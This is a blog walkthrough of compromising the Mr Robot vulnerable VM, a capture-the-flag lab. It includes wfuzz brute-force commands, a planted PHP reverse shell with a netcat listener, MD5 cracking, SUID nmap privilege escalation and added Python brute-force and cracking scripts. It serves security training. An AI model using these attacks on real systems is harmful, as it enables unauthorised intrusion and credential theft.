Mr Robot — A vulnerable VM Story.

Pete, published in SecurityBytes
6 min read, Jul 25, 2016

I’m a security analyst. Sometimes my work leads me to spend less time doing analysis of security than I’d like; when this occurs I always try to drag myself back into a technical area. Between myself and a ‘like minded individual’ we decided to test our mettle against some vulnerable virtual machines. Every single time I do stuff like this I realise how little I know.

Mr Robot was the VM we plumped for, using the tried and tested method of picking whatever was at the top of the list (at the time). “What list!?” I don’t hear you cry, because I currently only have one follower and that happens to be the fella I worked with on this VM. As, however, I am a benevolent blogger and shall consider future readers of this: vulnhub is where this badger originated. For the pedantic/lazy among you: MrRobot

Right, anyway. I launched it in VMWare player and it looks like this:

Fancy Eh?

So step one done.

Step two: find the machine on the local network. I launched my Kali VM (for those that are interested, I completed this VM using Kali and Mr Robot sat on top of Ubuntu). From Kali, as both machines were set up as host-only, I skipped nmap for host discovery (too slow) and ran:

ifconfig

to ID my own IP, then:

arp-scan -l

This is an ARP sweep of the local subnet; because it works at layer 2 it cannot be filtered by a host firewall and returns every live device in about 2 seconds.

root@kali:/usr/share/wordlists# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.240.1 00:50:56:c0:00:01 VMware, Inc.
192.168.240.129 00:0c:29:95:a7:ff VMware, Inc.
192.168.240.254 00:50:56:ff:e4:26 VMware, Inc.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.107 seconds (121.50 hosts/sec). 3 responded

There it is in the middle: 240.129 (mine was .128), so that’s what I’ll be targeting for the remainder of the write-up.

Now I deployed nmap

root@kali:/usr/share/wordlists# nmap -sV 192.168.240.129 -p 1-65335
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-28 12:01 BST
Nmap scan report for 192.168.240.129
Host is up (0.00047s latency).
Not shown: 65332 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 00:0C:29:95:A7:FF (VMware)

The switches are

  • -sV : service/version detection (banner-grab each open port).
  • -p : port range (nmap defaults to the top 1000 ports unless you tell it otherwise). Note the range above stops at 65335, a typo for 65535, so the last 200 ports were never checked; on this VM it made no difference, but the correct full range is -p 1-65535 or simply -p-.

So we can see there are two web services open (HTTP and HTTPS, both Apache) and one closed SSH port. It’s a fair guess that this is going to be a web-exploitation challenge.

Firing up IceWeasel and taking a look at the site gives us a pseudo-terminal based around the Mr Robot TV show.

It’s very flashy, but digging around didn’t really lead me anywhere.

Firing up Burp Suite and spidering the site instantly showed me the following:

It’s WordPress! And where there is WordPress there is a WordPress login page (/wp-login.php). However at this stage I have zero information to work on. Casting my eye quickly across the spider results shows /robots.txt

Browsing to this gives:

User-agent: *
fsocity.dic
key-1-of-3.txt

Key 1:
073403c8a58a1f80d943455fb30724b9

It is 32 hex characters, so it smells like an MD5. It doesn’t exist in any pre-cracked lists I could find, and I assumed the VM didn’t require you to brute force it, so it got squirreled away for later.

fsocity.dic (the spelling in robots.txt) is a wordlist of about 800k lines, most of them duplicates. A quick

sort -u fsocity.dic > fsoc.dic

reduced this to about 11k unique entries. Much more manageable, and it matters: every duplicate is a wasted login request later on.

Next I tried Burp Intruder with the dictionary for brute-forcing purposes. However, Intruder on the free version of Burp is throttled to the point of being an absolute shower of shite. As such I fired up wfuzz.

The interesting thing about the WordPress login is that you get a different error depending on which part is wrong, which turns the login page into a username-enumeration oracle:

If your user name is wrong the response contains Invalid (“Invalid username”).

If the user exists but the password is wrong it contains incorrect (“The password you entered for the username … is incorrect”).

Starting with the user name

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic --hs Invalid -d "log=FUZZ&pwd=aaaaa" http://192.168.240.129/wp-login.php

Which is:

  • -c : colourised output
  • -z : payload source, here a file (the wordlist)
  • --hs : hide every response whose body contains the string Invalid, so only candidate usernames that exist are shown
  • -d : the POST body (supplying -d makes wfuzz send a POST)
  • FUZZ : the placeholder in the POST body that each wordlist entry is substituted into

All this gave me the following user names (three spellings of one account, since WordPress matches usernames case-insensitively):

ELIOTT, eliott and Eliott

So using this we then repeat the fuzzing on the password field

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic --hs incorrect -d "log=eliott&pwd=FUZZ" http://192.168.240.129/wp-login.php

Which gives us:

ER28-0652

Using this I was able to log in to the WordPress admin console.
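The two wfuzz runs above are one procedure: dedupe the wordlist, enumerate usernames off the “Invalid” message, then enumerate the password for a known user off the “incorrect” message. The script below is an added example (my code, not the original post’s) that does the same thing with the oracle logic made explicit. It assumes the VM address and the wp-login.php field names (log, pwd, wp-submit), and ships with a constructed stand-in for the login page so it runs offline; pass a wordlist path on the command line to point the real HTTP login function at the target instead.

```python
"""WordPress login-oracle enumeration: dedupe wordlist, find users, find password."""
import urllib.parse
import urllib.request

# Assumed target, taken from the write-up's nmap output.
WP_LOGIN_URL = "http://192.168.240.129/wp-login.php"


def dedupe_wordlist(lines):
    """sort -u equivalent, but keeping first-seen order; blank lines dropped."""
    seen, out = set(), []
    for line in lines:
        word = line.strip()
        if word and word not in seen:
            seen.add(word)
            out.append(word)
    return out


def classify(body):
    """Map a wp-login.php response body to the oracle's three outcomes.
    'Invalid username' means no such user; '... is incorrect' means the user
    exists; anything else (the post-login redirect) is treated as success."""
    if "Invalid" in body:
        return "no_such_user"
    if "incorrect" in body:
        return "wrong_password"
    return "success"


def http_login(url, user, pwd, timeout=5):
    """Real POST to wp-login.php; returns the body. Not exercised offline."""
    data = urllib.parse.urlencode(
        {"log": user, "pwd": pwd, "wp-submit": "Log In"}).encode()
    req = urllib.request.Request(url, data=data,
                                 headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def enumerate_users(words, login):
    """Phase 1 (wfuzz --hs Invalid): junk password, keep words that are not 'Invalid'."""
    return [w for w in words if classify(login(w, "aaaaa")) != "no_such_user"]


def enumerate_password(user, words, login):
    """Phase 2 (wfuzz --hs incorrect): first word that is not 'incorrect' wins."""
    for w in words:
        if classify(login(user, w)) == "success":
            return w
    return None


# Constructed stand-in for the VM's login page, mimicking the real error text.
FAKE_USERS = {"eliott": "ER28-0652"}


def fake_login(user, pwd):
    if user.lower() not in FAKE_USERS:           # WordPress usernames are case-insensitive
        return "<div id='login_error'><strong>ERROR</strong>: Invalid username.</div>"
    if FAKE_USERS[user.lower()] != pwd:
        return ("<div id='login_error'><strong>ERROR</strong>: The password you "
                f"entered for the username {user} is incorrect.</div>")
    return "<html><body>Dashboard</body></html>"


def run_attack(wordlist_lines, login=fake_login):
    """Returns (valid_users, {user: password}) using the supplied login function."""
    words = dedupe_wordlist(wordlist_lines)
    users = enumerate_users(words, login)
    found = {}
    for u in users:
        pw = enumerate_password(u, words, login)
        if pw is not None:
            found[u] = pw
    return users, found


# Constructed wordlist with duplicates, shaped like fsocity.dic.
SAMPLE_WORDLIST = ["true", "false", "eliott", "Eliott", "ER28-0652",
                   "eliott", "robot", "ER28-0652", ""]

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:      # python3 wp_oracle.py fsoc.dic  -> hits the real target
        with open(sys.argv[1], encoding="latin-1") as f:
            users, found = run_attack(f, login=lambda u, p: http_login(WP_LOGIN_URL, u, p))
    else:                       # no args -> offline demo against fake_login
        users, found = run_attack(SAMPLE_WORDLIST)
    print("valid users:", users)
    print("credentials:", found)
```

Against the real VM this loop is serial, so 11k username requests plus up to 11k password requests take a while; wfuzz’s worker threads are why it was the better tool for the actual run. The point of the example is the classifier: the fix on the WordPress side is a single generic error for both cases, at which point phase 1 stops working.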

Once into the console things got a bit simpler. I wanted a reverse shell, and the easiest way to achieve this was to edit the active theme’s 404 template (404.php under Appearance > Editor) so that the whole page is the reverse shell.

The shell itself was just copy pasta from:

/usr/share/webshells/php/php-reverse-shell.php

with the listener IP address and port changed to point at my Kali box.

With this saved, I could now request any ‘page’ that doesn’t exist to launch my shell.

root@kali:~# nc -nvlp 443

Using the above netcat command to invoke a listener:

  • -n : numeric IP/No DNS
  • -v : Verbose
  • -l: Listen
  • -p: port

I browsed to a page that doesn’t exist. This gives us a shell, but a rubbish one: there is no TTY, so nothing that needs a terminal (su, sudo, editors, tab completion) works.

To upgrade it to a proper interactive shell we can use Python’s pty module:

echo 'import pty; pty.spawn("/bin/bash")' > /tmp/shell.py
python /tmp/shell.py

(or pass the same one-liner straight to python -c, which avoids leaving a file in /tmp).

Now we have a real shell, ‘whoami’ reveals we are ‘daemon’.

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false
bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false
mysql:x:1001:1001::/home/mysql:
varnish:x:999:999::/home/varnish:
robot:x:1002:1002::/home/robot:

robot looks interesting:

cd /home/robot
ls -lrt

gives:

key-2-of-3.txt
password.raw-md5

Key 2: can’t be read yet, it is only readable by robot and we are daemon. The hash file, however, is world-readable:

$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

This is an unsalted MD5 of the password, and a lookup against the usual online hash tables gives:

abcdefghijklmnopqrstuvwxyz
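Instead of an online lookup, the same thing done offline against a wordlist, as an added example (my code, not the original post’s). It parses the user:hash layout of password.raw-md5, hashes each candidate once and matches it against every target at the same time, so adding more users to the file costs nothing extra. The input file and the short candidate list are constructed here; key 1 from robots.txt is included as a target that, as the write-up says, does not crack.

```python
"""Offline cracking of a user:md5 file such as /home/robot/password.raw-md5."""
import hashlib

HEX = set("0123456789abcdef")


def parse_raw_md5(text):
    """Parse 'user:hexhash' lines; skip anything that is not a 32-hex-char digest."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        digest = digest.strip().lower()
        if len(digest) == 32 and set(digest) <= HEX:
            entries[user.strip()] = digest
    return entries


def md5_hex(candidate):
    """Raw, unsalted MD5, which is all password.raw-md5 contains."""
    return hashlib.md5(candidate.encode("utf-8", "surrogateescape")).hexdigest()


def crack(entries, candidates):
    """Hash every candidate once, match against all outstanding targets.
    Stops early once every hash is cracked. Returns {user: plaintext}."""
    wanted = {}                                   # digest -> [users sharing it]
    for user, digest in entries.items():
        wanted.setdefault(digest, []).append(user)
    cracked = {}
    for cand in candidates:
        cand = cand.rstrip("\r\n")
        h = md5_hex(cand)
        if h in wanted:
            for user in wanted.pop(h):
                cracked[user] = cand
            if not wanted:
                break
    return cracked


# Constructed input: the robot hash from the VM plus key 1 (uncrackable per the post).
RAW_MD5_FILE = """robot:c3fcd3d76192e4007dfb496cca67e13b
key1:073403c8a58a1f80d943455fb30724b9
not a hash line
"""

# Constructed candidate list; a real run streams fsoc.dic or rockyou.txt instead.
SAMPLE_CANDIDATES = ["password", "fsociety", "abcdefghijklmnopqrstuvwxyz", "ER28-0652"]


def demo():
    return crack(parse_raw_md5(RAW_MD5_FILE), SAMPLE_CANDIDATES)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:   # python3 crack_md5.py password.raw-md5 fsoc.dic
        with open(sys.argv[1]) as hashes, open(sys.argv[2], encoding="latin-1") as words:
            print(crack(parse_raw_md5(hashes.read()), words))
    else:
        print(demo())
```

Note the early exit: once every digest in the file has a match the loop stops, which matters when the candidate stream is a multi-million-line list.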

Now we have the password for robot we can su to robot (this is where the pty upgrade earlier pays off: su refuses to run without a terminal) and grab the second key.

Key 2:

822c73956184f694993bede3eb39f959

I then ran the following three commands, which list sticky-bit directories, SGID files and SUID files respectively, and reviewed the output:

robot@linux:~$ find / -perm -1000 -type d 2>/dev/null
/run/shm
/run/lock
/var/spool/cron/crontabs
/var/tmp
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix

robot@linux:~$ find / -perm -g=s -type f 2>/dev/null
/usr/bin/mail-touchlock
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/crontab
/usr/bin/chage
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/ssh-agent
/usr/bin/wall
/sbin/unix_chkpwd

robot@linux:~$ find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

The result that stuck out to me was:

/usr/local/bin/nmap

due to its location on the disk it seemed out of place: everything else in that list is a distro package in /bin, /usr/bin or /usr/lib, whereas /usr/local/bin is where hand-installed software ends up, and a hand-installed SUID-root binary is exactly what a box builder plants. Sure enough, a bit of Google-Fu later taught me that old nmap releases (2.02 up to 5.21) have an undocumented --interactive mode in which a line starting with ! is passed to the shell; because the binary is SUID and owned by root, anything spawned from it runs as root. Use !sh rather than !bash: bash drops the effective uid back to the real one on startup unless run with -p.
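The “it looked out of place” judgement above can be automated. The script below is an added example (my code, not the original post’s) that does what the three find commands do, then sorts the results so root-owned set-id files outside the normal package directories come first. The list of expected directories and the sample entries modelled on the find output above are my assumptions; run it with no arguments on a live box to walk the real filesystem.

```python
"""Set-id triage: list SUID/SGID files, flag the ones outside distro binary dirs."""
import os
import stat

# Assumed: where distro-packaged set-id binaries normally live. Anything under
# /usr/local, /opt, /home, /tmp or /var is hand-installed and worth a look.
EXPECTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                     "/usr/lib/", "/usr/libexec/")


def is_setid(mode):
    """True for a regular file with the SUID or SGID bit set (find -perm -u=s / -g=s)."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def describe(path, mode, uid):
    """One finding: which bits are set, owner, and whether the location is unusual."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("suid")
    if mode & stat.S_ISGID:
        bits.append("sgid")
    return {
        "path": path,
        "bits": "+".join(bits),
        "uid": uid,
        "root_owned": uid == 0,
        "out_of_place": not path.startswith(EXPECTED_PREFIXES),
    }


def triage(entries):
    """Pure logic over (path, mode, uid) triples; walk() feeds it from lstat."""
    findings = [describe(p, m, u) for p, m, u in entries if is_setid(m)]
    # Root-owned and out of place first: that is the /usr/local/bin/nmap case.
    findings.sort(key=lambda f: (not f["root_owned"], not f["out_of_place"], f["path"]))
    return findings


def walk(root="/"):
    """Equivalent of find / \\( -perm -u=s -o -perm -g=s \\) -type f, via lstat."""
    skip = {"/proc", "/sys", "/dev"}          # pseudo-filesystems, nothing to find
    entries = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)             # lstat: do not follow symlinks
            except OSError:
                continue
            entries.append((path, st.st_mode, st.st_uid))
    return triage(entries)


# Constructed sample modelled on the write-up's find output (mode, uid assumed).
SAMPLE = [
    ("/bin/su", 0o104755, 0),
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/local/bin/nmap", 0o104755, 0),
    ("/usr/bin/screen", 0o102755, 0),                # SGID only
    ("/home/robot/key-2-of-3.txt", 0o100600, 1002),  # plain file, ignored
    ("/tmp", 0o041777, 0),                           # sticky dir, not a regular file
]

if __name__ == "__main__":
    for f in walk():
        flag = "  <-- out of place" if f["out_of_place"] else ""
        print(f"{f['bits']:9} uid={f['uid']:<5} {f['path']}{flag}")
```

The sort order is the whole point: on a box with 20 SUID files you want the one that the package manager did not put there at the top, not buried between ping6 and pt_chown.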

# cd /root
# cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Game Over.

Caveats to this write-up. I have written up how I completed the challenge, not every method I tried along the way. Here is a list of things I also played with that led to nothing:

  • wpscan: I spent a lot of time trying to do a database dump from the all-in-one-seo-pack plugin.
  • Kernel version: there is a vuln in the kernel for a race condition allowing arbitrary reading of files. Spent some time considering if this could be used to dump /etc/shadow.
  • Apport 2.14.1 on Ubuntu 14.04 has a local root exploit. I’ll freely admit to spending a while with this before I realised certain things were not installed and this VM wasn’t vulnerable to it.
  • nmap: although this eventually turned out to be the way in, I spent quite a long time trying to use it in some ‘environmental’ capacity (symbolic links etc). Clearly that didn’t work.

EDITS: Formatting/Timeline/Words!

InfoSec architect, analyst and researcher. Suffering from full time imposter syndrome.